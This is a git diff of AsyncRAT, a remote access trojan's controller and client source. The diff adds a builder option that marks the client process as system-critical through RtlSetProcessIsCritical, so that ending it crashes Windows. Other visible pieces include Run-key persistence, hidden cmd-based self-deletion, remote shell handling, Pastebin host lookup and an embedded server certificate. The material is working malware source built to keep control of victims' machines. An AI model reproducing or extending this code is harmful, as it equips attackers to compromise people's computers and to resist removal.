diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs
index c8abfc3..0d77e0f 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs
@@ -77,7 +77,10 @@ namespace AsyncRAT_Sharp
this.Text = $"{Settings.Version}";
#if DEBUG
Settings.ServerCertificate = new X509Certificate2(Convert.FromBase64String("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"));
- Settings.Port = "6606";
+ listener = new Listener();
+ Thread thread = new Thread(new ParameterizedThreadStart(listener.Connect));
+ thread.IsBackground = true;
+ thread.Start(6606);
#else
using (FormPorts portsFrm = new FormPorts())
{
@@ -106,7 +109,7 @@ namespace AsyncRAT_Sharp
listener = new Listener();
Thread thread = new Thread(new ParameterizedThreadStart(listener.Connect));
thread.IsBackground = true;
- thread.Start(Convert.ToInt32(port.ToString().Trim()));
+ thread.Start(Convert.ToInt16(port.ToString().Trim()));
}
}
}
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.Designer.cs
index 5b717cf..733026f 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.Designer.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.Designer.cs
@@ -46,6 +46,7 @@ namespace AsyncRAT_Sharp.Forms
this.label3 = new System.Windows.Forms.Label();
this.label4 = new System.Windows.Forms.Label();
this.groupBox3 = new System.Windows.Forms.GroupBox();
+ this.chkBdos = new System.Windows.Forms.CheckBox();
this.txtMutex = new System.Windows.Forms.TextBox();
this.label5 = new System.Windows.Forms.Label();
this.chkAnti = new System.Windows.Forms.CheckBox();
@@ -54,6 +55,7 @@ namespace AsyncRAT_Sharp.Forms
this.tabPage1 = new System.Windows.Forms.TabPage();
this.tabPage2 = new System.Windows.Forms.TabPage();
this.tabPage3 = new System.Windows.Forms.TabPage();
+ this.pictureBox1 = new System.Windows.Forms.PictureBox();
this.groupBox1.SuspendLayout();
this.groupBox2.SuspendLayout();
this.groupBox3.SuspendLayout();
@@ -61,11 +63,12 @@ namespace AsyncRAT_Sharp.Forms
this.tabPage1.SuspendLayout();
this.tabPage2.SuspendLayout();
this.tabPage3.SuspendLayout();
+ ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit();
this.SuspendLayout();
//
// button1
//
- this.button1.Location = new System.Drawing.Point(6, 236);
+ this.button1.Location = new System.Drawing.Point(3, 302);
this.button1.Name = "button1";
this.button1.Size = new System.Drawing.Size(440, 49);
this.button1.TabIndex = 0;
@@ -225,20 +228,32 @@ namespace AsyncRAT_Sharp.Forms
//
// groupBox3
//
+ this.groupBox3.Controls.Add(this.pictureBox1);
+ this.groupBox3.Controls.Add(this.chkBdos);
this.groupBox3.Controls.Add(this.txtMutex);
this.groupBox3.Controls.Add(this.label5);
this.groupBox3.Controls.Add(this.chkAnti);
this.groupBox3.Location = new System.Drawing.Point(6, 17);
this.groupBox3.Name = "groupBox3";
- this.groupBox3.Size = new System.Drawing.Size(440, 174);
+ this.groupBox3.Size = new System.Drawing.Size(440, 229);
this.groupBox3.TabIndex = 9;
this.groupBox3.TabStop = false;
this.groupBox3.Text = "MISC";
//
+ // chkBdos
+ //
+ this.chkBdos.AutoSize = true;
+ this.chkBdos.Location = new System.Drawing.Point(21, 82);
+ this.chkBdos.Name = "chkBdos";
+ this.chkBdos.Size = new System.Drawing.Size(143, 24);
+ this.chkBdos.TabIndex = 12;
+ this.chkBdos.Text = "Process Critical";
+ this.chkBdos.UseVisualStyleBackColor = true;
+ //
// txtMutex
//
this.txtMutex.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "Mutex", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
- this.txtMutex.Location = new System.Drawing.Point(106, 98);
+ this.txtMutex.Location = new System.Drawing.Point(106, 165);
this.txtMutex.Name = "txtMutex";
this.txtMutex.Size = new System.Drawing.Size(271, 26);
this.txtMutex.TabIndex = 11;
@@ -247,7 +262,7 @@ namespace AsyncRAT_Sharp.Forms
// label5
//
this.label5.AutoSize = true;
- this.label5.Location = new System.Drawing.Point(14, 102);
+ this.label5.Location = new System.Drawing.Point(14, 169);
this.label5.Name = "label5";
this.label5.Size = new System.Drawing.Size(52, 20);
this.label5.TabIndex = 10;
@@ -308,6 +323,16 @@ namespace AsyncRAT_Sharp.Forms
this.tabPage3.Text = "Misc";
this.tabPage3.UseVisualStyleBackColor = true;
//
+ // pictureBox1
+ //
+ this.pictureBox1.Image = global::AsyncRAT_Sharp.Properties.Resources.uac;
+ this.pictureBox1.Location = new System.Drawing.Point(181, 74);
+ this.pictureBox1.Name = "pictureBox1";
+ this.pictureBox1.Size = new System.Drawing.Size(32, 32);
+ this.pictureBox1.SizeMode = System.Windows.Forms.PictureBoxSizeMode.AutoSize;
+ this.pictureBox1.TabIndex = 13;
+ this.pictureBox1.TabStop = false;
+ //
// FormBuilder
//
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F);
@@ -329,6 +354,7 @@ namespace AsyncRAT_Sharp.Forms
this.tabPage1.ResumeLayout(false);
this.tabPage2.ResumeLayout(false);
this.tabPage3.ResumeLayout(false);
+ ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit();
this.ResumeLayout(false);
}
@@ -359,5 +385,7 @@ namespace AsyncRAT_Sharp.Forms
private System.Windows.Forms.TabPage tabPage1;
private System.Windows.Forms.TabPage tabPage2;
private System.Windows.Forms.TabPage tabPage3;
+ private System.Windows.Forms.CheckBox chkBdos;
+ private System.Windows.Forms.PictureBox pictureBox1;
}
}
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs
index 72e2941..0aa920c 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs
@@ -147,6 +147,9 @@ namespace AsyncRAT_Sharp.Forms
if (operand == "%Serversignature%")
methodDef.Body.Instructions[i].Operand = aes.Encrypt(Convert.ToBase64String(signature));
+ if (operand == "%BDOS%")
+ methodDef.Body.Instructions[i].Operand = chkBdos.Checked.ToString().ToLower();
+
if (operand == "%Pastebin%")
if (chkPastebin.Checked)
methodDef.Body.Instructions[i].Operand = aes.Encrypt(txtPastebin.Text);
@@ -158,7 +161,7 @@ namespace AsyncRAT_Sharp.Forms
}
}
}
-
+
}
private void CheckBox2_CheckedChanged(object sender, EventArgs e)
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs
index 2ef0358..2e9aa6c 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs
@@ -16,6 +16,6 @@ namespace AsyncRAT_Sharp
public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12";
public static X509Certificate2 ServerCertificate;
- public static readonly string Version = "AsyncRAT 0.4.8B";
+ public static readonly string Version = "AsyncRAT 0.4.8C";
}
}
diff --git a/AsyncRAT-C#/Client/Client.csproj b/AsyncRAT-C#/Client/Client.csproj
index c2881c5..4e6c1a4 100644
--- a/AsyncRAT-C#/Client/Client.csproj
+++ b/AsyncRAT-C#/Client/Client.csproj
@@ -105,6 +105,7 @@
FormChat.cs
+
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs b/AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs
index 4204720..0cdf8d5 100644
--- a/AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs
+++ b/AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs
@@ -1,4 +1,5 @@
-using Microsoft.Win32;
+using Client.Helper;
+using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Diagnostics;
@@ -6,6 +7,7 @@ using System.IO;
using System.Linq;
using System.Security.Principal;
using System.Text;
+using System.Windows.Forms;
namespace Client.Handle_Packet
{
@@ -28,7 +30,7 @@ namespace Client.Handle_Packet
}
};
proc.Start();
- Environment.Exit(0);
+ Methods.ClientExit();
}
catch { }
}
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs b/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs
index ebfe442..342e6fc 100644
--- a/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs
+++ b/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs
@@ -10,14 +10,14 @@ using System.Text;
namespace Client.Handle_Packet
{
- public class HandleUninstall
+ public class HandleUninstall
{
public HandleUninstall()
{
- if (Convert.ToBoolean(Settings.Install))
+ if (Convert.ToBoolean(Settings.Install))
+ {
+ try
{
- try
- {
if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator))
Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run").DeleteValue(Path.GetFileName(Settings.ClientFullPath));
else
@@ -34,25 +34,24 @@ namespace Client.Handle_Packet
}
}
catch { }
- }
- ProcessStartInfo Del = null;
- try
+ }
+ ProcessStartInfo Del = null;
+ try
+ {
+ Del = new ProcessStartInfo()
{
- Del = new ProcessStartInfo()
- {
- Arguments = "/C choice /C Y /N /D Y /T 1 & Del \"" + Process.GetCurrentProcess().MainModule.FileName + "\"",
- WindowStyle = ProcessWindowStyle.Hidden,
- CreateNoWindow = true,
- FileName = "cmd.exe"
- };
- }
- catch { }
- finally
- {
- Methods.CloseMutex();
- Process.Start(Del);
- Environment.Exit(0);
- }
+ Arguments = "/C choice /C Y /N /D Y /T 1 & Del \"" + Process.GetCurrentProcess().MainModule.FileName + "\"",
+ WindowStyle = ProcessWindowStyle.Hidden,
+ CreateNoWindow = true,
+ FileName = "cmd.exe"
+ };
+ }
+ catch { }
+ finally
+ {
+ Process.Start(Del);
+ Methods.ClientExit();
+ }
}
}
}
diff --git a/AsyncRAT-C#/Client/Handle Packet/Packet.cs b/AsyncRAT-C#/Client/Handle Packet/Packet.cs
index 75fc7af..d4846b7 100644
--- a/AsyncRAT-C#/Client/Handle Packet/Packet.cs
+++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs
@@ -85,7 +85,7 @@ namespace Client.Handle_Packet
ClientSocket.Client.Dispose();
}
catch { }
- Environment.Exit(0);
+ Methods.ClientExit();
break;
}
@@ -98,7 +98,7 @@ namespace Client.Handle_Packet
}
catch { }
Process.Start(Application.ExecutablePath);
- Environment.Exit(0);
+ Methods.ClientExit();
break;
}
@@ -270,7 +270,7 @@ namespace Client.Handle_Packet
case "shellWriteInput":
{
if (HandleShell.ProcessShell != null)
- HandleShell.ShellWriteLine(unpack_msgpack.ForcePathObject("WriteInput").AsString);
+ HandleShell.ShellWriteLine(unpack_msgpack.ForcePathObject("WriteInput").AsString);
break;
}
diff --git a/AsyncRAT-C#/Client/Helper/Methods.cs b/AsyncRAT-C#/Client/Helper/Methods.cs
index f166be1..65bdcd2 100644
--- a/AsyncRAT-C#/Client/Helper/Methods.cs
+++ b/AsyncRAT-C#/Client/Helper/Methods.cs
@@ -43,5 +43,13 @@ namespace Client.Helper
_appMutex = null;
}
}
+
+ public static void ClientExit()
+ {
+ if (Convert.ToBoolean(Settings.BDOS))
+ ProcessCritical.Exit();
+ CloseMutex();
+ Environment.Exit(0);
+ }
}
}
diff --git a/AsyncRAT-C#/Client/Helper/ProcessCritical.cs b/AsyncRAT-C#/Client/Helper/ProcessCritical.cs
new file mode 100644
index 0000000..640af11
--- /dev/null
+++ b/AsyncRAT-C#/Client/Helper/ProcessCritical.cs
@@ -0,0 +1,32 @@
+using System;
+using System.Diagnostics;
+using System.Runtime.InteropServices;
+
+namespace Client.Helper
+{
+ public static class ProcessCritical
+ {
+ public static void Set()
+ {
+ try
+ {
+ Process.EnterDebugMode();
+ RtlSetProcessIsCritical(1, 0, 0);
+ }
+ catch { }
+ }
+ public static void Exit()
+ {
+ try
+ {
+ RtlSetProcessIsCritical(0, 0, 0);
+ }
+ catch { }
+ }
+
+ #region "Native Methods"
+ [DllImport("ntdll.dll", SetLastError = true)]
+ private static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, UInt32 v3);
+ #endregion
+ }
+}
diff --git a/AsyncRAT-C#/Client/Install/NormalStartup.cs b/AsyncRAT-C#/Client/Install/NormalStartup.cs
index 6f0b62a..7749179 100644
--- a/AsyncRAT-C#/Client/Install/NormalStartup.cs
+++ b/AsyncRAT-C#/Client/Install/NormalStartup.cs
@@ -69,9 +69,8 @@ namespace Client.Install
WindowStyle = ProcessWindowStyle.Hidden
});
}
- Methods.CloseMutex();
Process.Start(Settings.ClientFullPath);
- Environment.Exit(0);
+ Methods.ClientExit();
}
}
catch (Exception ex)
diff --git a/AsyncRAT-C#/Client/Program.cs b/AsyncRAT-C#/Client/Program.cs
index 6c353ca..ef1b9e8 100644
--- a/AsyncRAT-C#/Client/Program.cs
+++ b/AsyncRAT-C#/Client/Program.cs
@@ -34,6 +34,9 @@ namespace Client
if (Convert.ToBoolean(Settings.Install))
NormalStartup.Install();
+ if (Convert.ToBoolean(Settings.BDOS))
+ ProcessCritical.Set();
+
#if DEBUG
ClientSocket.InitializeClient();
#else
diff --git a/AsyncRAT-C#/Client/Settings.cs b/AsyncRAT-C#/Client/Settings.cs
index ff2d5f3..5b2ff84 100644
--- a/AsyncRAT-C#/Client/Settings.cs
+++ b/AsyncRAT-C#/Client/Settings.cs
@@ -12,7 +12,7 @@ namespace Client
#if DEBUG
public static string Ports = "6606";
public static string Hosts = "127.0.0.1";
- public static string Version = "AsyncRAT 0.4.8d";
+ public static string Version = "AsyncRAT 0.4.9C";
public static string Install = "false";
public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe");
public static string Key = "NYAN CAT";
@@ -23,10 +23,12 @@ namespace Client
public static string Anti = "false";
public static Aes256 aes256 = new Aes256(Key);
public static string Pastebin = "null";
+ public static string BDOS = "false";
+
#else
public static string Ports = "%Ports%";
public static string Hosts = "%Hosts%";
- public static string Version = "AsyncRAT 0.4.9B";
+ public static string Version = "AsyncRAT 0.4.9C";
public static string Install = "%Install%";
public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%Folder%"), "%File%");
public static string Key = "%Key%";
@@ -37,6 +39,7 @@ namespace Client
public static readonly string Anti = "%Anti%";
public static Aes256 aes256;
public static string Pastebin = "%Pastebin%";
+ public static string BDOS = "%BDOS%";
#endif